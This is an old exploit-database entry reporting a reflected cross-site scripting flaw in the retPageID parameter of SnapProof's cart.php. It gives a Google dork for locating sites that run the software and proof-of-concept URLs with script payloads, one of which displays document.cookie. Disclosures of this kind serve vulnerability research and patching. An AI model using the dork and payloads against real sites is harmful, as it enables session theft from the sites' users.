Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25823
HistoryMar 01, 2011 - 12:00 a.m.

SnapProof (cart.php) Cross Site Scripting

2011-03-0100:00:00
vulners.com
30

##########################################################

Exploit Title: SnapProof (cart.php) Cross Site Scripting

Google Dork: inurl:"Created and powered by SnapProof"

home : www.D99Y.com

Date: 1/3/2011

Author: Difficult 511

Software Link: http://www.snapproof.com/

##########################################################

file :

cart.php

exploit :

http://localhost/cart.php?retPageID= [ XSS ]

http://localhost/cart.php?retPageID=<script>alert(12345)</script>

http://localhost/cart.php?retPageID=<script>alert(document.cookie)</script>

##########################################################

Greetz :

NassRawI and all members D99Y.com

Enjoy :)